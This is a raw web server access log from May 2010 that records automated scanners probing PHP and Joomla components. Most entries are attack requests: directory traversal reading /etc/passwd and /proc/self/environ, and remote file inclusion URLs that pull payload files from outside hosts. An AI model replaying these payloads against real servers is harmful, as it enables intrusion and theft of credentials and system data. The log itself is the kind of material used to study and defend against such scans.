124.217.229.185 - - [23/May/2010:08:14:39 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:14:39 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:14:39 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:14:40 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:14:48 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:14:49 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.133.201.194 - - [23/May/2010:08:14:57 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:08:14:58 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 341 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:08:14:59 -0500] "GET /logs/access_log.1271548800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:08:15:27 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:15:27 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.241.251.224 - - [23/May/2010:08:16:03 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:08:16:03 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.195.112.180 - - [23/May/2010:08:16:37 -0500] "GET /tattoo/tattoo-cd.htm HTTP/1.0" 200 968 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.45.185.154 - - [23/May/2010:08:16:40 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:08:16:41 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
124.217.229.185 - - [23/May/2010:08:17:36 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:37 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:38 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:39 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.45.185.154 - - [23/May/2010:08:17:41 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:08:17:41 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
124.217.229.185 - - [23/May/2010:08:17:46 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:46 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:48 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:49 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
220.194.62.53 - - [23/May/2010:08:17:50 -0500] "GET /logs/access_log.1273017600%20/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
222.236.47.182 - - [23/May/2010:08:17:51 -0500] "GET /logs/access_log.1237420800%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:17:51 -0500] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:17:51 -0500] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:08:17:57 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:17:58 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
222.236.47.182 - - [23/May/2010:08:18:13 -0500] "GET /logs/access_log.1272412800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:18:17 -0500] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:18:17 -0500] "GET /logs/access_log.1237420800%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:18:17 -0500] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:18:20 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:18:20 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:18:20 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.236.47.182 - - [23/May/2010:08:18:27 -0500] "GET /logs/access_log.1271116800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:18:54 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:18:54 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
222.236.47.182 - - [23/May/2010:08:19:01 -0500] "GET /logs/access_log.1271548800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:19:01 -0500] "GET /logs/access_log.1272412800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:19:05 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:19:05 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:19:12 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:19:12 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:19:14 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:19:14 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
222.236.47.182 - - [23/May/2010:08:19:14 -0500] "GET /logs/access_log.1271116800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:08:19:18 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:19 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:19 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:19 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
220.194.62.53 - - [23/May/2010:08:19:22 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:19:22 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
124.217.229.185 - - [23/May/2010:08:19:28 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:28 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:40 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:51 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:19:51 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:20:02 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:20:02 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
88.191.94.188 - - [23/May/2010:08:20:04 -0500] "GET //atom.php5?page=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:08:20:04 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:08:20:04 -0500] "GET /logs//atom.php5?page=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:08:20:04 -0500] "GET /logs//atom.php5?page=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:08:20:04 -0500] "GET //atom.php5?page=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:08:20:04 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:21:19 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:21:19 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:22:52 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:22:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:22:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:23:24 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:24:46 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:24:46 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:24:46 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
222.236.47.182 - - [23/May/2010:08:24:56 -0500] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:24:56 -0500] "GET /logs/access_log.1237420800%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:24:56 -0500] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:25:17 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
222.236.47.182 - - [23/May/2010:08:25:37 -0500] "GET /logs/access_log.1272412800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.236.47.182 - - [23/May/2010:08:25:50 -0500] "GET /logs/access_log.1271116800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.167.140.113 - - [23/May/2010:08:26:02 -0500] "GET /logs/access_log.1273363200//png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.834"
64.27.53.238 - - [23/May/2010:08:26:02 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:26:02 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:26:02 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:26:02 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:26:02 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:26:02 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.167.140.113 - - [23/May/2010:08:26:12 -0500] "GET //png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:08:26:12 -0500] "GET /logs//png.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
78.129.134.15 - - [23/May/2010:08:27:46 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
78.129.134.15 - - [23/May/2010:08:27:46 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.46.13.89 - - [23/May/2010:08:28:32 -0500] "GET /logs/access_log.1256342400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [23/May/2010:08:28:33 -0500] "GET /logs/access_log.1271808000 HTTP/1.0" 200 676471 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.194.62.53 - - [23/May/2010:08:28:47 -0500] "GET /logs/access_log.1273017600%20/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
109.109.248.170 - - [23/May/2010:08:31:17 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
109.109.248.170 - - [23/May/2010:08:31:17 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
109.109.248.170 - - [23/May/2010:08:31:17 -0500] "GET /logs/access_log.1271548800//modules/4nAlbum/public/displayCategory.php?basepath=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
109.109.248.170 - - [23/May/2010:08:31:21 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
109.109.248.170 - - [23/May/2010:08:31:21 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
109.109.248.170 - - [23/May/2010:08:31:21 -0500] "GET /logs/access_log.1271548800//modules/4nAlbum/public/displayCategory.php?basepath=http://bantarax.fileave.com/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:08:31:55 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:31:55 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:31:55 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.13.41 - - [23/May/2010:08:32:02 -0500] "GET /logs/access_log.1258848000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.27.53.238 - - [23/May/2010:08:32:26 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:32:26 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:32:26 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:32:26 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:32:26 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:08:32:26 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.153.27.146 - - [23/May/2010:08:32:33 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.106.78.123 - - [23/May/2010:08:33:22 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:08:33:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:08:34:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.806"
220.194.62.53 - - [23/May/2010:08:35:01 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:35:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:08:35:01 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.149.84.14 - - [23/May/2010:08:35:12 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:08:35:12 -0500] "GET /playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:08:35:12 -0500] "GET /logs/access_log.1273622400%20%20/playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.106.78.123 - - [23/May/2010:08:36:03 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.806"
87.106.78.123 - - [23/May/2010:08:36:09 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.806"
218.149.84.14 - - [23/May/2010:08:36:48 -0500] "GET /logs/access_log.1271548800/playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:08:37:55 -0500] "GET /playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:08:37:55 -0500] "GET /logs/access_log.1273622400%20%20/playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.149.84.14 - - [23/May/2010:08:37:55 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:08:38:20 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:38:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:08:38:24 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
